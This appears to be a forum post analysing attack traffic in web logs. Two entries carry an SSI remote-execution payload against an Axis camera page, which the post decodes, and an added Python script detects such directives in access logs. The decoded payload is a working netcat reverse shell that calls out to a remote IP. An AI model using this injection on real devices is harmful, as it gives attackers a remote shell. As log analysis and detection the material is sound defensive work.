Web log entries that have shown up over the past few days:
193.124.7.9 - - [15/May/2022:19:40:45 +0800] "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20193.124.7.9%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n" 400 226 "-" "-"
45.148.10.81 - - [15/May/2022:23:07:30 +0800] "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20193.124.7.9%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n" 400 226 "-" "-"
After URL-decoding, this gives:
/incl/image_test.shtml?camnbr=<!--#exec cmd="mkfifo /tmp/s;nc -w 5 193.124.7.9 31337 0</tmp/s|/bin/sh>/tmp/s 2>/tmp/s;rm /tmp/s" -->
After some Googling, this turns out to be an Axis SSI remote execution and file read attack; I could not find any further explanation.
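An added example, not part of the original post: one way to find requests like these in an access log is to percent-decode each query parameter and match SSI directives in the result. The sample lines, IP addresses and function names are constructed for illustration, and the sample command is a harmless placeholder.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (documentation IPs, harmless command "id"),
# shaped like the entries above, including the literal "\n" before the quote.
SAMPLE_LOG = [
    r'203.0.113.5 - - [15/May/2022:19:40:45 +0800] "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22id%22%20--%3e HTTP/1.0\n" 400 226 "-" "-"',
    r'203.0.113.6 - - [15/May/2022:19:40:59 +0800] "GET /incl/image_test.shtml?camnbr=%253c%2521--%2523exec%2520cmd=%2522id%2522%2520--%253e HTTP/1.0" 404 196 "-" "-"',
    r'203.0.113.9 - - [15/May/2022:19:41:02 +0800] "GET /incl/image_test.shtml?camnbr=1 HTTP/1.1" 200 512 "-" "-"',
    r'203.0.113.7 - - [15/May/2022:19:42:10 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "-"',
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.*?) HTTP/[\d.]+(?:\\n)?" (?P<status>\d{3}) ')
# SSI directive: <!--#element attributes -->; args may contain ">" (shell redirects).
SSI_RE = re.compile(r'<!--#\s*(exec|include|echo|printenv|config|set)\b(.*?)-->',
                    re.I | re.S)

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are also seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_ssi_injection(lines):
    """Return one finding per query parameter that carries an SSI directive."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        for pair in query.split("&"):  # split manually: payloads may contain ";"
            name, _, raw = pair.partition("=")
            hit = SSI_RE.search(decode(raw))
            if hit:
                findings.append({
                    "ip": m["ip"], "time": m["ts"], "path": path,
                    "param": name, "directive": hit.group(1).lower(),
                    "args": hit.group(2).strip(), "status": int(m["status"]),
                })
    return findings

if __name__ == "__main__":
    for finding in find_ssi_injection(SAMPLE_LOG):
        print(finding)
```

The status field is worth keeping in each finding: the entries above were answered with 400, while a 200 on the same path and payload would call for a closer look at the host.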